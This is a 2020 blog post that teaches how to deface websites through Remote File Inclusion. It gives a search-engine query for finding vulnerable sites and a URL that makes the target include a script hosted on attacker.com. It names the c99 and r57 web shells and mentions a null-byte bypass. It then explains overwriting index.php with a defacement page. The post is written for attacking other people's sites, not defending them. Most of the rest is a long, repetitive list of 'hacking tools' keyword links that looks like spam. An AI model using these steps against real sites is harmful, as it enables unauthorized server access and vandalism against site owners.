Tuesday, August 25, 2020

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

More information


  1. Pentest Tools Website Vulnerability
  2. Hak5 Tools
  3. Pentest Tools Find Subdomains
  4. Hack Tools For Games
  5. Pentest Tools For Ubuntu
  6. How To Make Hacking Tools
  7. Pentest Tools Framework
  8. Hacking Tools 2020
  9. Hacker Tools Github
  10. Pentest Tools Bluekeep
  11. Pentest Tools Website Vulnerability
  12. How To Make Hacking Tools
  13. Install Pentest Tools Ubuntu
  14. New Hacker Tools
  15. Pentest Tools Free
  16. Hacks And Tools
  17. Wifi Hacker Tools For Windows
  18. Pentest Tools Windows
  19. Pentest Tools Bluekeep
  20. Pentest Tools Free
  21. Hacker Tools For Pc
  22. Hack Tools 2019
  23. Beginner Hacker Tools
  24. Hacker Tools
  25. Hacker Search Tools
  26. Pentest Tools Android
  27. Free Pentest Tools For Windows
  28. Hacker Tools For Windows
  29. Pentest Tools Tcp Port Scanner
  30. Pentest Automation Tools
  31. Github Hacking Tools
  32. Pentest Tools For Windows
  33. Hack Tools For Mac
  34. Hacker Tools For Pc
  35. Hacking Tools For Mac
  36. Black Hat Hacker Tools
  37. Hack Tools For Ubuntu
  38. Hacking Tools And Software
  39. Hack Tools Pc
  40. Pentest Tools List
  41. Hacking Tools Software
  42. Hacker Tools Software
  43. Hack Tools
  44. Hacking Tools For Kali Linux
  45. Pentest Tools Nmap
  46. Bluetooth Hacking Tools Kali
  47. Pentest Tools Apk
  48. Pentest Tools Tcp Port Scanner
  49. Computer Hacker
  50. Game Hacking
  51. Hack Apps
  52. Hacker Tools Apk
  53. Hacker Tools Mac
  54. Hacking Tools For Windows 7
  55. Ethical Hacker Tools
  56. Hacker Hardware Tools
  57. Pentest Tools Linux
  58. How To Make Hacking Tools
  59. Hak5 Tools
  60. Hacker Tools Software
  61. Pentest Reporting Tools
  62. Game Hacking
  63. Hacking Tools Pc
  64. Pentest Tools Port Scanner
  65. Hacker Tools Mac
  66. Hacks And Tools
  67. Install Pentest Tools Ubuntu
  68. Hackers Toolbox
  69. Hacks And Tools
  70. Hacking Tools For Pc
  71. Termux Hacking Tools 2019
  72. Hack Tools
  73. Top Pentest Tools
  74. Blackhat Hacker Tools
  75. Hacker Tools Hardware
  76. Hacking Tools And Software
  77. Hacking App
  78. Best Hacking Tools 2020
  79. Hacking Tools Name
  80. Hacking Tools For Windows 7
  81. Hacker Tools Software
  82. Pentest Recon Tools
  83. How To Hack
  84. Hack Apps
  85. Hacking Tools Windows
  86. Pentest Tools Online
  87. Hacking Tools Software
  88. Hacker Tools Github
  89. How To Hack
  90. Computer Hacker
  91. Hacker Tools Hardware
  92. Pentest Tools Apk
  93. Hacking Tools And Software
  94. Pentest Recon Tools
  95. Computer Hacker
  96. Hacking Tools For Windows
  97. Pentest Box Tools Download
  98. Hacking Apps
  99. Hacker Tools Apk
  100. Hacking Tools Windows
  101. Hack Tools Mac
  102. Hacker Tools Online
  103. Hacker Tools Hardware
  104. Blackhat Hacker Tools
  105. Beginner Hacker Tools
  106. Hack App
  107. Hacker Search Tools
  108. Hacking Tools Github
  109. Black Hat Hacker Tools
  110. Pentest Tools Review
  111. Hacker Tools For Ios
  112. Hack Tools Download
  113. Hackrf Tools
  114. Hacker Tools Apk Download
  115. Pentest Tools For Windows
  116. Hacker Tools Software
  117. Pentest Tools Windows
  118. Hacker
  119. Hacking Tools Usb
  120. Pentest Tools Review
  121. New Hack Tools
  122. Hacking Tools 2019
  123. Hacker Tools Online
  124. Hacking Tools Pc
  125. Hack Tool Apk No Root
  126. Best Hacking Tools 2019
  127. New Hacker Tools
  128. Game Hacking
  129. Hacker Tools For Pc
  130. Pentest Tools Kali Linux
  131. Hacker Tools Free
  132. Hacker Tools Free Download
  133. Pentest Tools For Windows
  134. Pentest Tools For Mac
  135. Pentest Tools Github
  136. Pentest Tools Online
  137. Hacking Tools For Windows 7
  138. Hacker Tools Linux
  139. Best Hacking Tools 2019
  140. Pentest Tools Tcp Port Scanner
  141. Hacking Tools For Beginners
  142. Termux Hacking Tools 2019

No comments:

Post a Comment